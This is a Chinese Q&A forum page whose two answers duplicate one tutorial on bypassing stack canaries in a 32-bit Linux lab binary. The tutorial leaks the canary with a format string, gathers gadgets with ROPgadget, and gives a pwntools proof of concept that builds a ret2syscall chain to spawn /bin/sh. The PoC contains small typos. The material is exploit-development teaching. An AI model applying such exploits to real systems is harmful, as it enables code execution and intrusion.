构造带有堆栈保护的指令流 - 互联社区

构造带有堆栈保护的指令流财富值6

2021-01-14 19:16发布

站内问答 / 电脑入门

180 2

男 |

私信

2条回答

1楼 · 2021-01-14 20:18.采纳回答


	zhaorong 于 2020-5-27 11:51 编辑 0×01 引言我们在学ropgadgets与ret2syscall技术原理时构造指令流时是没有加堆栈保护的比如下面的程序：文件名：7.c #include <stdio.h> #include <string.h> #include <sys/types.h> #include <unistd.h> #include <sys/syscall.h> void exploit() { system("/bin/sh"); } void func(){ 复制代码我们是这样编译的是没有加堆栈保护的之后再利用ropgadgets构造指令流就可以成功去执行execve(“/bin/sh”,null,null)。 gcc -no-pie -fno-stack-protector -static -m32 -o 7.exe 7.c 复制代码如果加上堆栈保护我们该怎么过呢？像下面这样编译： gcc -no-pie -fstack-protector -static -m32 -o 7.exe 7.c 复制代码显然我们就不能像原来一样构造指令流了因为加入了堆栈保护那我们该怎么办呢？我们可以利用格式化输出将canary打印出来然后再进行指令的组装。 0×02 找地址调试我们的程序找到canary的地址地址在：0xffffcfac 1587745815_5ea31417c0222.png (23.57 KB, 下载次数: 0) 下载附件 2020-5-27 11:38 上传继续调试直到printf 我们看看现在canary据栈顶的位置：0060 除以4等于15 说明传给第一个read 函数的值为%15$08x 就可以将canary打印出来了 1587746171_5ea3157b00597.png (234.75 KB, 下载次数: 0) 下载附件 2020-5-27 11:39 上传重新调试找到read函数把读进来的数据存放的地址：0xffffcf8c 19.png (21.99 KB, 下载次数: 0) 下载附件 2020-5-27 11:39 上传将%15$08x给read函数发现可以将canary打印出来 16.png (27.78 KB, 下载次数: 0) 下载附件 2020-5-27 11:40 上传接下来就是利用好第二个read函数来构造rop链了 0×03 构造rop链 linux上系统调用原理： eax 系统调用号 ebx 第一个参数 ecx 第二个参数 edx 第三个参数 esi 第四个参数 edi 第五个参数 int 0×80 所以eax就存放execve函数的系统调用号11 ebx存放第一个参数/bin/sh ecx存放第二个参数null 就是0 edx存放第三个参数也是0 ROPgadget --binary ./7.exe --only "pop\|ret" \| grep "eax" 复制代码地址用：0x080b8546 13.png (31.14 KB, 下载次数: 0) 下载附件 2020-5-27 11:43 上传 ROPgadget --binary ./7.exe --only "pop\|ret" \| grep "ebx" \| grep "ecx" \| grep "edx" 复制代码地址为：0x0806f210 12.png (17.52 KB, 下载次数: 0) 下载附件 2020-5-27 11:44 上传 ROPgadget --binary ./7.exe --string "/bin/sh" 复制代码地址用：0x080bbd80 11.png (19.88 KB, 下载次数: 0) 下载附件 2020-5-27 11:45 上传 ROPgadget --binary ./7.exe --only "int"\|grep "0x80" 复制代码地址为：0x0806ce37 9.png (20.72 KB, 下载次数: 0) 下载附件 2020-5-27 11:46 上传 0×04 写出poc from pwn import * context(arch="i386",os="linux") p=process(./7.exe) p.sendline("%15$08x") canary=p.recv()[:8] print(canary) canary=canary.decode("hex")[::-1] coffset=48 roffset=34 add_eax=p32(0x080b8546) value_eax=p32(0xb) add_edx_ecx_ebx=p32(0x0806f210) value_ebx=p32(0x080bbd80) value_ecx=p32(0) value_edx=p32(0) add_int=p32(0x0806ce37) payload=coffseta+canary+roffseta+add_eax+value_eax+add_edx_ecx_ ebx+value_edx+value_ecx+value_ebx+add_int p.sendline(payload) p.interactive() 复制代码从from pwn import 到canary=canary.decode(“hex”)[::-1]都是为了找出canary 因为加了堆栈保护我们不能直接把数据打入到堆栈中所以要先找出canary，然后构造payload，我们要把canary加进去过堆栈保护再在后面加上我们的rop链。执行成功 8.png* (35.79 KB, 下载次数: 1) 下载附件 2020-5-27 11:48 上传 0×05 总结开启了堆栈保护加入了cookie 一旦我们破坏了堆栈会引起系统保护出现异常但是我们还是需要构造我们的指令流我们可以利用格式化输出，将canary打印出来，接下来我们可以利用读写函数，构造一个指令流，我们先去读看一下堆栈的canary在哪里，然后我们canary搞出来，把canary再回填进去，进行组装，这样就即可以过堆栈保护也可以构造我们的指令流了。

62人赞添加讨论(1) 举报

2楼-- · 2021-01-14 20:16


	zhaorong 于 2020-5-27 11:51 编辑 0×01 引言我们在学ropgadgets与ret2syscall技术原理时构造指令流时是没有加堆栈保护的比如下面的程序：文件名：7.c #include <stdio.h> #include <string.h> #include <sys/types.h> #include <unistd.h> #include <sys/syscall.h> void exploit() { system("/bin/sh"); } void func(){ 复制代码我们是这样编译的是没有加堆栈保护的之后再利用ropgadgets构造指令流就可以成功去执行execve(“/bin/sh”,null,null)。 gcc -no-pie -fno-stack-protector -static -m32 -o 7.exe 7.c 复制代码如果加上堆栈保护我们该怎么过呢？像下面这样编译： gcc -no-pie -fstack-protector -static -m32 -o 7.exe 7.c 复制代码显然我们就不能像原来一样构造指令流了因为加入了堆栈保护那我们该怎么办呢？我们可以利用格式化输出将canary打印出来然后再进行指令的组装。 0×02 找地址调试我们的程序找到canary的地址地址在：0xffffcfac 1587745815_5ea31417c0222.png (23.57 KB, 下载次数: 0) 下载附件 2020-5-27 11:38 上传继续调试直到printf 我们看看现在canary据栈顶的位置：0060 除以4等于15 说明传给第一个read 函数的值为%15$08x 就可以将canary打印出来了 1587746171_5ea3157b00597.png (234.75 KB, 下载次数: 0) 下载附件 2020-5-27 11:39 上传重新调试找到read函数把读进来的数据存放的地址：0xffffcf8c 19.png (21.99 KB, 下载次数: 0) 下载附件 2020-5-27 11:39 上传将%15$08x给read函数发现可以将canary打印出来 16.png (27.78 KB, 下载次数: 0) 下载附件 2020-5-27 11:40 上传接下来就是利用好第二个read函数来构造rop链了 0×03 构造rop链 linux上系统调用原理： eax 系统调用号 ebx 第一个参数 ecx 第二个参数 edx 第三个参数 esi 第四个参数 edi 第五个参数 int 0×80 所以eax就存放execve函数的系统调用号11 ebx存放第一个参数/bin/sh ecx存放第二个参数null 就是0 edx存放第三个参数也是0 ROPgadget --binary ./7.exe --only "pop\|ret" \| grep "eax" 复制代码地址用：0x080b8546 13.png (31.14 KB, 下载次数: 0) 下载附件 2020-5-27 11:43 上传 ROPgadget --binary ./7.exe --only "pop\|ret" \| grep "ebx" \| grep "ecx" \| grep "edx" 复制代码地址为：0x0806f210 12.png (17.52 KB, 下载次数: 0) 下载附件 2020-5-27 11:44 上传 ROPgadget --binary ./7.exe --string "/bin/sh" 复制代码地址用：0x080bbd80 11.png (19.88 KB, 下载次数: 0) 下载附件 2020-5-27 11:45 上传 ROPgadget --binary ./7.exe --only "int"\|grep "0x80" 复制代码地址为：0x0806ce37 9.png (20.72 KB, 下载次数: 0) 下载附件 2020-5-27 11:46 上传 0×04 写出poc from pwn import * context(arch="i386",os="linux") p=process(./7.exe) p.sendline("%15$08x") canary=p.recv()[:8] print(canary) canary=canary.decode("hex")[::-1] coffset=48 roffset=34 add_eax=p32(0x080b8546) value_eax=p32(0xb) add_edx_ecx_ebx=p32(0x0806f210) value_ebx=p32(0x080bbd80) value_ecx=p32(0) value_edx=p32(0) add_int=p32(0x0806ce37) payload=coffseta+canary+roffseta+add_eax+value_eax+add_edx_ecx_ ebx+value_edx+value_ecx+value_ebx+add_int p.sendline(payload) p.interactive() 复制代码从from pwn import 到canary=canary.decode(“hex”)[::-1]都是为了找出canary 因为加了堆栈保护我们不能直接把数据打入到堆栈中所以要先找出canary，然后构造payload，我们要把canary加进去过堆栈保护再在后面加上我们的rop链。执行成功 8.png* (35.79 KB, 下载次数: 1) 下载附件 2020-5-27 11:48 上传 0×05 总结开启了堆栈保护加入了cookie 一旦我们破坏了堆栈会引起系统保护出现异常但是我们还是需要构造我们的指令流我们可以利用格式化输出，将canary打印出来，接下来我们可以利用读写函数，构造一个指令流，我们先去读看一下堆栈的canary在哪里，然后我们canary搞出来，把canary再回填进去，进行组装，这样就即可以过堆栈保护也可以构造我们的指令流了。

45人赞添加讨论(0) 举报

一周热门更多>

相关问答